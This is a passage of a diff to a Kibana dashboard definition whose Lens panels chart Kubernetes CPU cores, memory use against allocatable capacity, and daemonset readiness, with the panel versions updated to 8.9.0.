"ratio" + }, + "830de93b-4051-4716-99e4-83d625a91288X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.container\" " + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.container.cpu.usage.nanocores" + }, + "830de93b-4051-4716-99e4-83d625a91288X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "830de93b-4051-4716-99e4-83d625a91288X0", + 1000000000 + ], + "location": { + "max": 63, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", + "type": "function" } + }, + "references": [ + "830de93b-4051-4716-99e4-83d625a91288X0" + ], + "scale": "ratio" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "af01f323-afc0-4b55-b453-8da15facfc28": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" } + }, + "incompleteColumns": {} }, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "33530265-ff62-49e7-9518-f430efb0dde0", - "w": 8, - "x": 0, - "y": 4 - }, - "panelIndex": "33530265-ff62-49e7-9518-f430efb0dde0", - "title": "Nodes", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c165f898-73a9-48b1-afa9-2b6e75f3cc1f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dde29dcf-00ae-4b80-8d9e-ab45c51efba0", - "type": "index-pattern" + "dde29dcf-00ae-4b80-8d9e-ab45c51efba0": { + "columnOrder": [ + "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", + "c609fc21-331c-4bbe-81c3-ef8251f3cf80", + "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" + ], + "columns": { + "c609fc21-331c-4bbe-81c3-ef8251f3cf80": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.state_node\" and kubernetes.node.status.ready:\"true\" " + }, + "isBucketed": false, + "label": "Total Cores", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.cpu.allocatable.cores" + }, + "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "fbaf3405-fab6-4f09-883d-45368cf97670", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "c165f898-73a9-48b1-afa9-2b6e75f3cc1f": { - "columnOrder": [ - "7113c7e7-1af9-4350-b5d2-57abcb60c633", - "af01f323-afc0-4b55-b453-8da15facfc28", - "830de93b-4051-4716-99e4-83d625a91288X0", - "830de93b-4051-4716-99e4-83d625a91288X1", - "830de93b-4051-4716-99e4-83d625a91288" - ], - "columns": { - "7113c7e7-1af9-4350-b5d2-57abcb60c633": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.container.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.container.name" - }, - "830de93b-4051-4716-99e4-83d625a91288": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.container\" " - }, - "isBucketed": false, - "label": "Cores Used", - "operationType": "formula", - "params": { - "format": { - "id": "number" - }, - "formula": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "isFormulaBroken": false - }, - "references": [ - "830de93b-4051-4716-99e4-83d625a91288X1" - ], - "scale": "ratio" - }, - "830de93b-4051-4716-99e4-83d625a91288X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.container\" " - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.container.cpu.usage.nanocores" - }, - "830de93b-4051-4716-99e4-83d625a91288X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "830de93b-4051-4716-99e4-83d625a91288X0", - 1000000000 - ], - "location": { - "max": 63, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.container.cpu.usage.nanocores)/1000000000", - "type": "function" - } - }, - "references": [ - "830de93b-4051-4716-99e4-83d625a91288X0" - ], - "scale": "ratio" - }, - "af01f323-afc0-4b55-b453-8da15facfc28": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "dde29dcf-00ae-4b80-8d9e-ab45c51efba0": { - "columnOrder": [ - "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", - "c609fc21-331c-4bbe-81c3-ef8251f3cf80", - "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" - ], - "columns": { - "c609fc21-331c-4bbe-81c3-ef8251f3cf80": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.state_node\" and kubernetes.node.status.ready:\"true\" " - }, - "isBucketed": false, - "label": "Total Cores", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.cpu.allocatable.cores" - }, - "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fbaf3405-fab6-4f09-883d-45368cf97670", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.container", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.container", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.container" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.5, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "830de93b-4051-4716-99e4-83d625a91288" - ], - "collapseFn": "sum", - "layerId": "c165f898-73a9-48b1-afa9-2b6e75f3cc1f", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "area", - "splitAccessor": "7113c7e7-1af9-4350-b5d2-57abcb60c633", - "xAccessor": "af01f323-afc0-4b55-b453-8da15facfc28", - "yConfig": [ - { - "axisMode": "left", - "color": "#00bfb3", - "forAccessor": "830de93b-4051-4716-99e4-83d625a91288" - } - ] - }, - { - "accessors": [ - "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" - ], - "collapseFn": "sum", - "layerId": "dde29dcf-00ae-4b80-8d9e-ab45c51efba0", - "layerType": "data", - "palette": { - "name": "negative", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", - "xAccessor": "c609fc21-331c-4bbe-81c3-ef8251f3cf80", - "yConfig": [ - { - "axisMode": "left", - "color": "#bd271e", - "forAccessor": "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "top", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fbaf3405-fab6-4f09-883d-45368cf97670", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.container", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.container", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.container" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "830de93b-4051-4716-99e4-83d625a91288" + ], + "collapseFn": "sum", + "layerId": "c165f898-73a9-48b1-afa9-2b6e75f3cc1f", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "area", + "splitAccessor": "7113c7e7-1af9-4350-b5d2-57abcb60c633", + "xAccessor": "af01f323-afc0-4b55-b453-8da15facfc28", + "yConfig": [ + { + "axisMode": "left", + "color": "#00bfb3", + "forAccessor": "830de93b-4051-4716-99e4-83d625a91288" + } + ] + }, + { + "accessors": [ + "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" + ], + "collapseFn": "sum", + "layerId": "dde29dcf-00ae-4b80-8d9e-ab45c51efba0", + "layerType": "data", + "palette": { + "name": "negative", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", - "w": 20, - "x": 28, - "y": 4 - }, - "panelIndex": "d0fadeee-3c79-443b-bfcb-b70e78d168e9", - "title": "Cores used vs total cores", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "seriesType": "line", + "splitAccessor": "f64f7970-3f7d-4f2d-88ae-9e008f2e0bc5", + "xAccessor": "c609fc21-331c-4bbe-81c3-ef8251f3cf80", + "yConfig": [ + { + "axisMode": "left", + "color": "#bd271e", + "forAccessor": "e1c6fec1-182f-4bf2-aa22-434cd1aa9a95" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "top", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Cores used vs total cores" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "a91d36c0-f405-4c04-8510-11134bd259f0", + "w": 20, + "x": 8, + "y": 4 + }, + "panelIndex": "a91d36c0-f405-4c04-8510-11134bd259f0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dfd1702f-213e-4fa2-98e3-5106657c62e7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "21cde57c-0e69-4e4c-b3e9-659de2778d06", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dfd1702f-213e-4fa2-98e3-5106657c62e7": { + "columnOrder": [ + "f0953a4e-8498-4b22-a63a-d24e4a069ed3", + "5c33dcdb-21de-4bdc-b564-ba82ed037d11", + "62125b6d-3199-420b-9d3b-46f159e15d7f" + ], + "columns": { + "5c33dcdb-21de-4bdc-b564-ba82ed037d11": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "62125b6d-3199-420b-9d3b-46f159e15d7f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.ready:\"true\" and data_stream.dataset :\"kubernetes.state_node\" " + }, + "isBucketed": false, + "label": "Total Memory", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-dff09473-7596-48c7-bbf4-beccee70d845", - "type": "index-pattern" + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.memory.allocatable.bytes" + }, + "f0953a4e-8498-4b22-a63a-d24e4a069ed3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "21cde57c-0e69-4e4c-b3e9-659de2778d06", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "dfd1702f-213e-4fa2-98e3-5106657c62e7": { - "columnOrder": [ - "f0953a4e-8498-4b22-a63a-d24e4a069ed3", - "5c33dcdb-21de-4bdc-b564-ba82ed037d11", - "62125b6d-3199-420b-9d3b-46f159e15d7f" - ], - "columns": { - "5c33dcdb-21de-4bdc-b564-ba82ed037d11": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "62125b6d-3199-420b-9d3b-46f159e15d7f": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.ready:\"true\" and data_stream.dataset :\"kubernetes.state_node\" " - }, - "isBucketed": false, - "label": "Total Memory", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.memory.allocatable.bytes" - }, - "f0953a4e-8498-4b22-a63a-d24e4a069ed3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - }, - "dff09473-7596-48c7-bbf4-beccee70d845": { - "columnOrder": [ - "6677e92c-5874-49c1-979e-c16c0d3838cd", - "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", - "307be273-94a6-41ab-b93b-0debde733492" - ], - "columns": { - "307be273-94a6-41ab-b93b-0debde733492": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "data_stream.dataset :\"kubernetes.container\" " - }, - "isBucketed": false, - "label": "Memory Used", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.container.memory.usage.bytes" - }, - "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "6677e92c-5874-49c1-979e-c16c0d3838cd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100000 values of kubernetes.container.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 100000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.container.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "21cde57c-0e69-4e4c-b3e9-659de2778d06", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.container", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.container", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.container" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.5, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "307be273-94a6-41ab-b93b-0debde733492" - ], - "collapseFn": "sum", - "layerId": "dff09473-7596-48c7-bbf4-beccee70d845", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "area", - "splitAccessor": "6677e92c-5874-49c1-979e-c16c0d3838cd", - "xAccessor": "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", - "yConfig": [ - { - "axisMode": "left", - "color": "#00bfb3", - "forAccessor": "307be273-94a6-41ab-b93b-0debde733492" - } - ] - }, - { - "accessors": [ - "62125b6d-3199-420b-9d3b-46f159e15d7f" - ], - "collapseFn": "sum", - "layerId": "dfd1702f-213e-4fa2-98e3-5106657c62e7", - "layerType": "data", - "palette": { - "name": "negative", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "f0953a4e-8498-4b22-a63a-d24e4a069ed3", - "xAccessor": "5c33dcdb-21de-4bdc-b564-ba82ed037d11", - "yConfig": [ - { - "axisMode": "left", - "color": "#bd271e", - "forAccessor": "62125b6d-3199-420b-9d3b-46f159e15d7f" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "top", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "a91d36c0-f405-4c04-8510-11134bd259f0", - "w": 20, - "x": 8, - "y": 4 - }, - "panelIndex": "a91d36c0-f405-4c04-8510-11134bd259f0", - "title": "Memory used vs total memory", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "295ecdc5-f413-4f20-9f77-74927a10d33d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", - "name": "state_daemonset-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value != 0) {emit(1)}" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value == 0) {emit(1)}" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } + "dff09473-7596-48c7-bbf4-beccee70d845": { + "columnOrder": [ + "6677e92c-5874-49c1-979e-c16c0d3838cd", + "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", + "307be273-94a6-41ab-b93b-0debde733492" + ], + "columns": { + "307be273-94a6-41ab-b93b-0debde733492": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "data_stream.dataset :\"kubernetes.container\" " + }, + "isBucketed": false, + "label": "Memory Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "e36fb66d-f9b0-46d3-aec4-52638d34d308", - "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", - "0e2a3f8d-cc26-453d-bed1-b184e48756b2", - "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" - ], - "columns": { - "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "not_ready" - }, - "0e2a3f8d-cc26-453d-bed1-b184e48756b2": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "ready" - }, - "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "e36fb66d-f9b0-46d3-aec4-52638d34d308": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "0e2a3f8d-cc26-453d-bed1-b184e48756b2", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - } - }, - "incompleteColumns": {} - } - } - } + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.container.memory.usage.bytes" + }, + "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "30s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6677e92c-5874-49c1-979e-c16c0d3838cd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100000 values of kubernetes.container.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "295ecdc5-f413-4f20-9f77-74927a10d33d", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [ - { - "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "0e2a3f8d-cc26-453d-bed1-b184e48756b2", - "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": 